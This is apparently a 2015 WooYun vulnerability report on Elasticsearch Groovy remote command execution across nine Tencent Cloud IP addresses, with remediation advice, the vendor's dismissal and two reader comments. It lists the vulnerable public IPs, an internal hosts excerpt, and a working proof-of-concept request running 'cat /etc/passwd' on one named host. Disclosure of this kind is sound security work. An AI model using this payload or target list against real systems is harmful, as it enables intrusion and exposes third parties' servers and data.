腾讯云9个IP存在Elasticsearch Groovy命令执行漏洞

编号99671
Urlhttp://www.wooyun.org/bug.php?action=view&id=99671
漏洞状态漏洞已经通知厂商但是厂商忽略漏洞
漏洞标题腾讯云9个IP存在Elasticsearch Groovy命令执行漏洞
漏洞类型命令执行
厂商腾讯
白帽子lijiejie
提交日期2015-03-05 16:58:00
公开日期2015-03-05 17:20:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank3
厂商评级
厂商评rank0
漏洞简介
腾讯9个IP存在Elasticsearch Groovy命令执行漏洞,看了下,非腾讯自身业务,可能是腾讯云的客户
漏洞细节

[Found] 203.195.148.250 is vulnerable!
[Found] 203.195.149.189 is vulnerable!
[Found] 203.195.151.221 is vulnerable!
[Found] 203.195.187.125 is vulnerable!
[Found] 203.195.194.168 is vulnerable!
[Found] 203.195.197.22 is vulnerable!
[Found] 203.195.197.82 is vulnerable!
[Found] 203.195.212.109 is vulnerable!
[Found] 203.195.234.184 is vulnerable!


POC

看了几个都是root:

"#127.0.0.1\tTENCENT64.site TENCENT64", "10.143.86.204 damaster", "10.143.86.206 daslave0", "10.232.66.220 daslave1", "10.143.86.208 daslave2", "10.249.146.58 daslave3", "#10.249.173.82 daslave4", "#10.249.166.34 daslave5"


POST http://203.195.234.184:9200/_search?pretty
{"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}


tencent_es.png

修复方案

升级或配置script.groovy.sandbox.enabled: false
不绑定外网IP

状态信息 2015-03-05: 细节已通知厂商并且等待厂商处理中
2015-03-05: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复非常感谢您的反馈,报告中反馈的问题并不属于腾讯业务。
回应信息危害等级:无影响厂商忽略忽略时间:2015-03-05 17:20
Showing 1-2 of 2 items.
评论内容评论人点赞数评论时间

如何确认是谁的业务是个大问题?各位大牛是怎么做的?

xxyyzz02015-03-06 09:41:00

这是在扫全网么??

hkAssassin02015-03-05 17:29:00